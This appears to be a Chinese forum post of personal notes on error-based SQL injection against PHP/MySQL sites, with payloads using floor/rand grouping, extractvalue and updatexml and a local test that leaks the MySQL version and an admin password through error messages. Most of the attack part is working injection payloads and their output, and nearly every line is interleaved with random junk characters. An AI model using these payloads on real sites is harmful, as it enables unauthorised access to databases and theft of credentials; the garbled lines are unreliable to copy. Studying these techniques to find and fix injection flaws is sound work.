放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
* N' ]) `7 J! w) L7 _0 ?2 }, E% ]3 o" A! u实际测试环境:
! e2 [) e( d8 z
% c, A0 B5 F; s% F8 r) F 5 s- J- O; j) i8 ^0 ?1 l! U
mysql> show tables;/ d) l/ S% ]% g" [6 m) X$ B
+----------------+
8 h! e, d+ J" Z E: ~) P8 S| Tables_in_test |
$ R2 \$ V; ^( Z' k B2 \8 y+----------------+- p9 ^; P! S; p& N3 F- g* W
| admin |
_; g1 J1 k3 R2 ^1 P| article |
3 e! K' Z6 V% ?: s+----------------+) g% e" Y5 }* l; T5 g) C
/ j. H) r6 o; L5 C- s+ D4 F! \4 y
. u" a1 y- K+ }5 B0 C$ z% m9 `2 T R" I, G* D; n
mysql> describe admin;
9 L( P0 t: `4 n; P) h6 V+-------+------------------+------+-----+---------+----------------+
( P- ^' j# n, L3 v| Field | Type | Null | Key | Default | Extra |
; J, C- {$ }! T9 m* U+-------+------------------+------+-----+---------+----------------+* Y( o- B5 O; s" ?9 Q+ P
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |$ `( b* @# R0 b% ]1 u5 Y
| user | varchar(50) | NO | | NULL | |: r: C6 H# o2 _4 {$ Z% y' p
| pass | varchar(50) | NO | | NULL | |+ @! ~& j! n1 b+ {
+-------+------------------+------+-----+---------+----------------+
2 j9 }1 G+ ?5 D8 J" A" |2 w! } & d6 a$ S$ ^- Y
, J3 [4 h! a( o
3 `! z, |& M8 }8 y' _# D, j5 m
mysql> describe article;- `1 f1 {: W& R' ~: \# g4 B+ O
+---------+------------------+------+-----+---------+----------------+. a, W" M ]2 `/ j
| Field | Type | Null | Key | Default | Extra |0 ~5 V/ X$ o H3 {4 }
+---------+------------------+------+-----+---------+----------------+
4 I! x/ Z9 ?) @: S+ T| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. W8 x6 O0 R: I2 p7 B& h8 q, m
| title | varchar(50) | NO | | NULL | |
0 h/ C! } r& r7 m) F2 || content | varchar(50) | NO | | NULL | |
) M/ r0 c$ h! E c+---------+------------------+------+-----+---------+----------------+
; I+ f9 c6 \9 e1、通过floor报错5 u) |! Z' N1 I; w5 q
可以通过如下一些利用代码
( w7 h: k2 X. F* d4 S- _/ N1 A
+ C% S/ y a$ m; L
1 u6 C. t, s$ `' }0 C% I! f# Land select 1 from (select count(*),concat(version(),floor(rand(0)*2))x0 d) }' x. o, @
from information_schema.tables group by x)a);
6 V" j' A. f* m H/ ^0 k: E3 f& p
+ s" e' P5 F; [$ R! |2 I5 T* c2 d
9 U' S' Z( X4 Sand (select count(*) from (select 1 union select null union select !1)x
8 `6 }/ X/ f7 W+ j% ^group by concat((select table_name from information_schema.tables limit 1),8 U! @$ y" t l. L" Y
floor(rand(0)*2)));, e$ ?& }6 r( j% r- [
举例如下:
6 v! d- `* N1 n9 m! z3 D/ e首先进行正常查询:
& d% F! Q( ?0 R: ` - }: U$ x5 _/ O: a x( [7 E, t
mysql> select * from article where id = 1;# [3 [3 D5 \& q" J) P% z+ V. e% C. n
+----+-------+---------+' m {+ c$ W6 S0 `1 ?6 I, i
| id | title | content |3 y: V8 X# B7 M- U, {
+----+-------+---------+
6 @9 ^# G( v; x) L: m% m| 1 | test | do it |" I6 a6 |, U5 E0 ?8 ?9 k
+----+-------+---------+& o. p- g7 _7 K) s7 v/ J
假如id输入存在注入的话,可以通过如下语句进行报错。
: E( q& f$ g, i: v0 r. X
+ }2 S8 v4 q6 j
* [1 Q* M/ L; x( u. jmysql> select * from article where id = 1 and (select 1 from
! W: ^2 \/ M8 R5 Q* a2 N7 _5 z(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2 n* f0 L7 x T0 \! `ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'* z6 k- I+ G+ R; k
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。' M; C% _- I' l' R% t: _
例如我们需要查询管理员用户名和密码: V1 t. Y; h& B4 O- ?( f$ B
Method1:7 ]% `: r; r$ |: M7 p& ^5 }4 p# V
' C& ? B. \; T" k
$ r+ y- G% M0 f- b {: D7 Pmysql> select * from article where id = 1 and (select 1 from
0 t( h1 j5 {& p5 S* R1 B' p3 k6 U$ ^(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
9 _+ ~3 x, Y" i6 w% Wfrom information_schema.tables group by x)a);
6 t0 k z3 A* \' E6 XERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'5 |3 v7 W; s, u; i" [; \
Method2:$ t- k: @" g8 j i8 O- l+ B
# y- G2 w; k' p4 l6 I' o
. p2 g2 I8 {/ T, t; n Mmysql> select * from article where id = 1 and (select count(*)
+ w$ q7 q2 l ]; p% i$ N$ u/ pfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),. z6 a# P8 |' e5 l c
floor(rand(0)*2)));
& p# {9 N$ s: w; H: hERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
4 P* _0 i$ [" X. l% P$ H2、ExtractValue& A- e, E6 F$ n$ z+ M% j9 n
测试语句如下
9 w& X- b+ l5 _1 ^* ~: n & G" |" {! _$ z9 Y) W9 A- n+ w
& I: u5 P" g' V* M, eand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# y+ K5 J& a% g5 b7 S
实际测试过程
/ ~3 [+ S/ e& V! G6 V
" Q& J7 Y5 d" @9 ?: a
! ?3 L4 b. Q4 w) @) W2 Fmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
5 M- p; u% [, m! {& N! p, N(select pass from admin limit 1)));--
: e! X: ^- }' jERROR 1105 (HY000): XPATH syntax error: '\admin888'2 W4 a2 Y7 T, Z1 q/ x
3、UpdateXml' k m, N8 h: o3 P4 ?5 P8 U4 O! J% ~
测试语句. c, g9 ~; ~' i. r
4 Z) L1 c% v" L9 n5 F, J) M v
2 l! A5 L$ b; O; Oand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))3 n( @( o+ |) D; ?2 Q
实际测试过程
1 I1 w% z3 H& c6 E+ X" d# @" }" e; d : _+ v" t! n. P5 G( L7 ^! ?
3 D! u, h0 O8 t; F
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,7 n T1 ]' z, W9 n$ m6 Y0 N
(select pass from admin limit 1),0x5e24),1));7 W* c( q. l5 K0 w; v
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
3 R! Y$ d- G4 o& v+ L1 {All, thanks foreign guys.# ~+ ?3 M6 J s& i
$ G# g- G" M6 U5 X( N; U8 Q- L( k6 K0 q# y% E2 m
|